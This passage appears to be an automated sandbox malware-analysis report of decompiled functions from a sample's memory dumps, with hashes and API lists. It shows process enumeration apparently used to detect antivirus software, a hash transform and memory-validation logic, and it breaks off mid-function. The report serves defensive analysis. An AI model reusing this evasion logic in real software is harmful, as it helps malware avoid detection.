Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 08a5d09ec0b10301a049e42536d98fe869d4db8f59f4ad284e2391bed588ba38
Instruction ID: 3c415997184d952bca0bbc6e6c20fd918c15ba0eab8a16883b092202e64f826a
Opcode Fuzzy Hash: 08a5d09ec0b10301a049e42536d98fe869d4db8f59f4ad284e2391bed588ba38
Instruction Fuzzy Hash: E7F0FF75D01258EFDF11DBD8D588AEDB7B8EF04309F1480AAE512A7240D7B45B44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00D98779, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D98779(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00D9A4CA(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00D945B3(_a4);
				}
				return _t13;
			}

0x00d98785
0x00d9878a
0x00d9878e
0x00d98795
0x00d987a0
0x00d987a4
0x00d987a4
0x00d987ad

APIs

Part of subcall function 00D9A4CA: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 00D9A500
Part of subcall function 00D9A4CA: memset.NTDLL ref: 00D9A575
Part of subcall function 00D9A4CA: memset.NTDLL ref: 00D9A589

memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00D95C08,?,?,00D96223,00000002,?,?,?), ref: 00D98795

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
Instruction ID: 0bb1936337249f4d978be01e028c7cd73503e03d70f8b772d41aae8a19c40415
Opcode Fuzzy Hash: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
Instruction Fuzzy Hash: 3DE04F3740011876CF122A94DC01EFB7E6CCB51690F044021FD0C55201D661C91097F2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D95946, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D95946() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xd9d2a4; // 0x3e3a5a8
						_t2 = _t9 + 0xd9ee28; // 0x73617661
						_push( &_v264);
						if( *0xd9d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00d95951
0x00d9595b
0x00d9595f
0x00d95969
0x00d9599a
0x00d95970
0x00d95975
0x00d95982
0x00d9598b
0x00d959a2
0x00d9598d
0x00d95995
0x00000000
0x00d95995
0x00d959a3
0x00d959a4
0x00000000
0x00d959a4
0x00000000
0x00d9599e
0x00d959aa
0x00d959af

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D95956
Process32First.KERNEL32(00000000,?), ref: 00D95969
Process32Next.KERNEL32(00000000,?), ref: 00D95995
CloseHandle.KERNEL32(00000000), ref: 00D959A4

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5b8656266f2215a2da616d606fc67772d1b495f020f9ee789a0de59fa8c3cc48
Instruction ID: 34d5978022db0a73ab9f8a6c4a60682da9afa3aefe635022845e0a3857e712dd
Opcode Fuzzy Hash: 5b8656266f2215a2da616d606fc67772d1b495f020f9ee789a0de59fa8c3cc48
Instruction Fuzzy Hash: 55F09632201525FAEF22A766AC49DEB776CDBC5320F040172F94DD3108E620D9464BB5

Uniqueness

Uniqueness Score: -1.00%

Function 005110D8, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E005110D8() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x514130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x51413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x51412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x514128 = _t5;
						 *0x514130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x514124 = _t6;
						if(_t6 == 0) {
							 *0x514124 =  *0x514124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x005110d9
0x005110e7
0x005110ed
0x005110f4
0x0051114b
0x0051114b
0x005110f6
0x005110fe
0x0051110b
0x0051110b
0x00511147
0x00511149
0x00000000
0x00000000
0x00000000
0x00511100
0x00511107
0x0051110d
0x0051110d
0x00511112
0x00511120
0x00511125
0x0051112b
0x00511131
0x00511138
0x0051113a
0x0051113a
0x00511144
0x00511109
0x00511109
0x00000000
0x00511109
0x00511107

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00511F23), ref: 005110E7
GetVersion.KERNEL32(?,00511F23), ref: 005110F6
GetCurrentProcessId.KERNEL32(?,00511F23), ref: 00511112
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00511F23), ref: 0051112B

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: d29ea703855621cae68764d29528834fafb85061fefe4b672d4a39b82d5beb19
Instruction ID: a23f477a16f03cbf2a743afd85d61f183895816969f6a19a1a7e7d9b46713bef
Opcode Fuzzy Hash: d29ea703855621cae68764d29528834fafb85061fefe4b672d4a39b82d5beb19
Instruction Fuzzy Hash: A5F019B1AC0701BBEB205B68BC19BD47FA0B729B22F119165E742D61E4D76089C9EF48

Uniqueness

Uniqueness Score: -1.00%

Function 00D915CD, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E00D915CD(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x00d915d0
0x00d915db
0x00d915de
0x00d915e1
0x00d915e2
0x00d91600
0x00d91602
0x00d91605
0x00d91608
0x00d91608
0x00d9160b
0x00d9160b
0x00d9160e
0x00d9160e
0x00d91611
0x00d91611
0x00d9162e
0x00d91631
0x00d91647
0x00d9164a
0x00d91664
0x00d91667
0x00d9167d
0x00d91680
0x00d91682
0x00d9169a
0x00d9169d
0x00d916a0
0x00d916b8
0x00d916bb
0x00d916d5
0x00d916d8
0x00d916ee
0x00d916f1
0x00d916f3
0x00d9170b
0x00d91710
0x00d91713
0x00d91729
0x00d9172c
0x00d91746
0x00d91749
0x00d9175f
0x00d91762
0x00d91764
0x00d9177f
0x00d91782
0x00d91799
0x00d9179c
0x00d917a0
0x00d917b9
0x00d917bc
0x00d917be
0x00d917c1
0x00d917dc
0x00d917df
0x00d917f8
0x00d917fb
0x00d9180b
0x00d9180e
0x00d91826
0x00d91829
0x00d91843
0x00d91846
0x00d9185e
0x00d91861
0x00d91877
0x00d9187a
0x00d91892
0x00d91895
0x00d918ad
0x00d918b0
0x00d918ca
0x00d918cd
0x00d918e3
0x00d918e6
0x00d918fe
0x00d91901
0x00d9191b
0x00d9191e
0x00d91936
0x00d91939
0x00d9194f
0x00d91952
0x00d9196a
0x00d9196d
0x00d91985
0x00d91988
0x00d9199a
0x00d9199d
0x00d919af
0x00d919b2
0x00d919c4
0x00d919c7
0x00d919cb
0x00d919db
0x00d919de
0x00d919ec
0x00d919ef
0x00d91a01
0x00d91a04
0x00d91a18
0x00d91a1b
0x00d91a1d
0x00d91a2d
0x00d91a30
0x00d91a42
0x00d91a45
0x00d91a53
0x00d91a56
0x00d91a68
0x00d91a6b
0x00d91a6f
0x00d91a7f
0x00d91a82
0x00d91a94
0x00d91a97
0x00d91aa5
0x00d91aa8
0x00d91aba
0x00d91abd
0x00d91acf
0x00d91ad2
0x00d91ae6
0x00d91ae9
0x00d91afd
0x00d91b00
0x00d91b14
0x00d91b17
0x00d91b2b
0x00d91b2e
0x00d91b42
0x00d91b45
0x00d91b59
0x00d91b5e
0x00d91b70
0x00d91b73
0x00d91b87
0x00d91b8a
0x00d91b9e
0x00d91ba1
0x00d91bb7
0x00d91bba
0x00d91bce
0x00d91bd1
0x00d91be3
0x00d91be6
0x00d91bfa
0x00d91bfd
0x00d91c11
0x00d91c14
0x00d91c28
0x00d91c31
0x00d91c34
0x00d91c3d
0x00d91c46
0x00d91c4e
0x00d91c56
0x00d91c60
0x00d91c75

APIs

memset.NTDLL ref: 00D91C69

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
Instruction ID: 31439f46090c64ad9158d01ebddfc114ec99387fde15954a7d44014007f8fe95
Opcode Fuzzy Hash: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
Instruction Fuzzy Hash: 1622947BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9B10D, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9B10D(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xd9d2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xd9d320 = 1;
										__eflags =  *0xd9d320;
										if( *0xd9d320 != 0) {
											goto L60;
										}
										_t84 =  *0xd9d2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xd9d320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xd9d2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xd9d2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xd9d2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xd9d320 = 1;
							__eflags =  *0xd9d320;
							if( *0xd9d320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xd9d320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xd9d2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xd9d2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xd9d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
